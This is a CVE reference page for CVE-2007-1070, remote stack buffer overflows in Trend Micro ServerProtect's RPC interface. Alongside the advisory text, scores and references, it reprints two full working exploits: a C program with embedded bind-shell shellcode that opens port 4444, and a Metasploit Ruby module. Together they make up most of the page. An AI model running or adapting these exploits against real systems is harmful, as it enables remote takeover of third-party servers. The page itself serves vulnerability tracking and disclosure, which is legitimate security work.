CVE-2007-1070 : Detail

CVE-2007-1070

93.29%V3
Network
2007-02-21
10h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple stack-based buffer overflows in Trend Micro ServerProtect for Windows and EMC 5.58, and for Network Appliance Filer 5.61 and 5.62, allow remote attackers to execute arbitrary code via crafted RPC requests to TmRpcSrv.dll that trigger overflows when calling the (1) CMON_NetTestConnection, (2) CMON_ActiveUpdate, and (3) CMON_ActiveRollback functions in (a) StCommon.dll, and (4) ENG_SetRealTimeScanConfigInfo and (5) ENG_SendEMail functions in (b) eng50.dll.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4367

Publication date : 2007-09-05 22h00 +00:00
Author : devcode
EDB Verified : Yes

/* * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Trend Micro ServerProtect eng50.dll Stack Overflow * [CVE-2007-1070] * * * Description: * A boundary error within a function in eng50.dll can be * exploited to cause a stack-based buffer overflow via a * specially crafted RPC request to the SpntSvc.exe service. * * Hotfix/Patch: * http://www.trendmicro.com/download/product.asp?productid=17 * * Vulnerable systems: * ServerProtect for Windows 5.58 * ServerProtect for EMC 5.58 * ServerProtect for Network Appliance Filer 5.61 * ServerProtect for Network Appliance Filer 5.62 * * Tested on: * Microsoft Windows 2000 SP4 * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Notes: * <3 TippingPoint for technical details. Had this made few days after * disclosure (few months back), was rlsd on r1918 about a week ago * and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW * I WAS THIS HOT DAYUM * * */ #include <iostream> #include <windows.h> #pragma comment( lib, "ws2_32.lib" ) /* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */ unsigned char uszDceBind[] = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00" "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" "\x88\x88\x28\x25\x5B\xBD\xD1\x11\x9D\x53\x00\x80\xC8\x3A\x5C\x2C" "\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00" "\x2B\x10\x48\x60\x02\x00\x00\x00"; /* rpc_opnum_0 */ unsigned char uszDceCall[] = "\x05\x00\x00\x83\x10\x00\x00\x00\x08\x08\x00\x00\x01\x00\x00\x00" "\xE0\x07\x00\x00\x00\x00\x00\x00\x88\x88\x28\x25\x5B\xBD\xD1\x11" "\x9D\x53\x00\x80\xC8\x3A\x5C\x2C\x04\x00\x03\x00\xD0\x07\x00\x00"; /* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */ unsigned char uszShellcode[] = "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab" "\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2" "\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca" "\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56" "\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37" "\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe" "\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde" "\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04" "\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19" "\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8" "\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81" "\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba" "\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f" "\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d" "\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04" "\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb" "\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90" "\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96" "\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02" "\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85" "\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d" "\x7d\xe0\xa6\xd2\xab\x1f"; void usage( ) { printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n" "\t\t\t(c) 2007 devcode\n\n" "usage: tmicro.exe <ip> <port>\n"); } int main( int argc, char **argv ) { WSADATA wsaData; SOCKET sConnect; SOCKADDR_IN sockAddr; char szRecvBuf[512]; unsigned char uszPacket[2056]; int nRet; if ( argc < 3 ) { usage( ); return -1; } if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) { printf("[-] Unable to startup winsock\n"); return -1; } sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); if ( sConnect == INVALID_SOCKET ) { printf("[-] Invalid socket\n"); return -1; } sockAddr.sin_family = AF_INET; sockAddr.sin_addr.s_addr = inet_addr( argv[1] ); sockAddr.sin_port = htons( atoi( argv[2] ) ); printf("[+] Connecting to %s:%s\n", argv[1], argv[2] ); nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) ); if ( nRet == SOCKET_ERROR ) { printf("[-] Cannot connect to server\n"); closesocket( sConnect ); return -1; } printf("[+] Sending DCE Bind packet...\n"); nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 ); if ( nRet == SOCKET_ERROR ) { printf("[-] Cannot send\n"); closesocket( sConnect ); return -1; } nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); if ( nRet <= 0 ) { printf("[-] Recv failed\n"); closesocket( sConnect ); return -1; } memset( uszPacket, 0x41, sizeof( uszPacket ) ); memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) ); memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 ); /* call ebx, 0x6574131C, TmRpcSrv.dll */ /* jmp ebx, 0x7C4E4A66, kernel32.dll */ memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 ); memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 ); printf("[+] Sending DCE Request packet...\n"); nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 ); if ( nRet == SOCKET_ERROR ) { printf("[-] Cannot send\n"); closesocket( sConnect ); return -1; } printf("[+] Check shell on port 4444 :)\n"); nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); closesocket( sConnect ); return 0; } // milw0rm.com [2007-09-06]
Exploit Database EDB-ID : 16827

Publication date : 2010-04-29 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: trendmicro_serverprotect.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC def initialize(info = {}) super(update_info(info, 'Name' => 'Trend Micro ServerProtect 5.58 Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ ['CVE', '2007-1070'], ['OSVDB', '33042'], ['BID', '22639'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00", 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => [ [ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x6563124c } ], # CALL EBX - StCommon.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 20 2007')) register_options( [ Opt::RPORT(5168) ], self.class ) end def exploit connect handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") filler = payload.encoded + rand_text_english(1600 - payload.encoded.length) + [target.ret].pack('V') len = filler.length # CMON_NetTestConnection sploit = NDR.long(0x000a0017) + NDR.long(len) + filler + NDR.long(0) print_status("Trying target #{target.name}...") begin dcerpc_call(0, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse end handler disconnect end end

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version r2

    Microsoft>>Windows_2003_server >> Version sp2

      Microsoft>>Windows_nt >> Version *

      Microsoft>>Windows_vista >> Version *

        Microsoft>>Windows_xp >> Version *

        Trend_micro>>Serverprotect >> Version 5.58

          Configuraton 0

          Trend_micro>>Serverprotect >> Version 5.58

            Trend_micro>>Serverprotect >> Version 5.61

              Trend_micro>>Serverprotect >> Version 5.62

                References

                http://www.kb.cert.org/vuls/id/466609
                Tags : third-party-advisory, x_refsource_CERT-VN
                http://secunia.com/advisories/24243
                Tags : third-party-advisory, x_refsource_SECUNIA
                http://osvdb.org/33042
                Tags : vdb-entry, x_refsource_OSVDB
                http://www.kb.cert.org/vuls/id/630025
                Tags : third-party-advisory, x_refsource_CERT-VN
                http://www.kb.cert.org/vuls/id/730433
                Tags : third-party-advisory, x_refsource_CERT-VN
                http://www.securityfocus.com/bid/22639
                Tags : vdb-entry, x_refsource_BID
                http://www.vupen.com/english/advisories/2007/0670
                Tags : vdb-entry, x_refsource_VUPEN
                http://www.kb.cert.org/vuls/id/349393
                Tags : third-party-advisory, x_refsource_CERT-VN
                http://www.securitytracker.com/id?1017676
                Tags : vdb-entry, x_refsource_SECTRACK